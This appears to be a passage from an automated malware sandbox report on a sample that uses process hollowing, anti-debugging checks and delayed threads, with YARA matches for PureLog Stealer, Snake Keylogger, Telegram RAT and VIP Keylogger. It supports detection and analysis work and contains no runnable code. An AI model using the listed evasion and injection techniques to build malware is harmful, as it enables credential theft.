          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596638
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596516
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596406
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596287
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596156
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596016
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595688
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595577
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595468
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595359
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595250
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595141
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595031
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594922
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594812
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594703
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594594
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594469
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594359
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594249
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594141
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594031
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593922
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593812
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593703
          Source: Nsltarpn.PIF, 0000000F.00000002.2047274828.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
          Source: Nsltarpn.PIF, 0000000B.00000002.1972185080.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
          Source: npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: brightness.exe, 00000004.00000002.1853607956.000000000088D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP9
          Source: npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3080226661.0000000032424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\SysWOW64\brightness.exeAPI call chain: ExitProcess graph end nodegraph_4-29804
          Source: C:\Users\Public\Libraries\npratlsN.pifAPI call chain: ExitProcess graph end nodegraph_8-84502
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\npratlsN.pifAPI call chain: ExitProcess graph end node
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_0291F024
          Source: C:\Windows\SysWOW64\brightness.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess queried: DebugPort
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess queried: DebugPort
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C887A28 LdrInitializeThunk,8_2_2C887A28
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918798 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02918798
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040ADB0 GetProcessHeap,HeapFree,8_2_0040ADB0
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040E61C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00416F6A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004123F1 SetUnhandledExceptionFilter,8_2_004123F1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_1_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_1_0040E61C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_1_00416F6A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004123F1 SetUnhandledExceptionFilter,8_1_004123F1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040E61C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00416F6A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004123F1 SetUnhandledExceptionFilter,14_2_004123F1
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Windows\SysWOW64\brightness.exeMemory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFMemory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFMemory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\brightness.exeSection unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000Jump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\brightness.exeMemory written: C:\Users\Public\Libraries\npratlsN.pif base: 33C008Jump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFMemory written: C:\Users\Public\Libraries\npratlsN.pif base: 240008
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFMemory written: C:\Users\Public\Libraries\npratlsN.pif base: 226008
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pifJump to behavior
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Windows\SysWOW64\brightness.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02905A78
          Source: C:\Windows\SysWOW64\brightness.exeCode function: GetLocaleInfoA,4_2_0290A790
          Source: C:\Windows\SysWOW64\brightness.exeCode function: GetLocaleInfoA,4_2_0290A744
          Source: C:\Windows\SysWOW64\brightness.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02905B84
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: GetLocaleInfoA,8_2_00417A20
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: GetLocaleInfoA,8_1_00417A20
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_027D5A78
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: GetLocaleInfoA,11_2_027DA790
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_027D5B83
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: GetLocaleInfoA,14_2_00417A20
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290918C GetLocalTime,4_2_0290918C
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290B70C GetVersionExA,4_2_0290B70C
          Source: C:\Users\Public\Libraries\npratlsN.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected PureLog Stealer
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000E.00000002.3083897007.0000000034231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075519147.00000000208E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076785533.0000000028AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206fa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTR
          Yara detected VIP Keylogger
          Source: Yara matchFile source: 14.2.npratlsN.pif.33faa8ee.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2866a8ee.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.3.npratlsN.pif.1ea7e990.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.206f9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.33fa9a06.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20ee8.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.23470000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.2b690000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 18.2.npratlsN.pif.22e20000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.28669a06.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.npratlsN.pif.36830000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, type: UNPACKEDPE
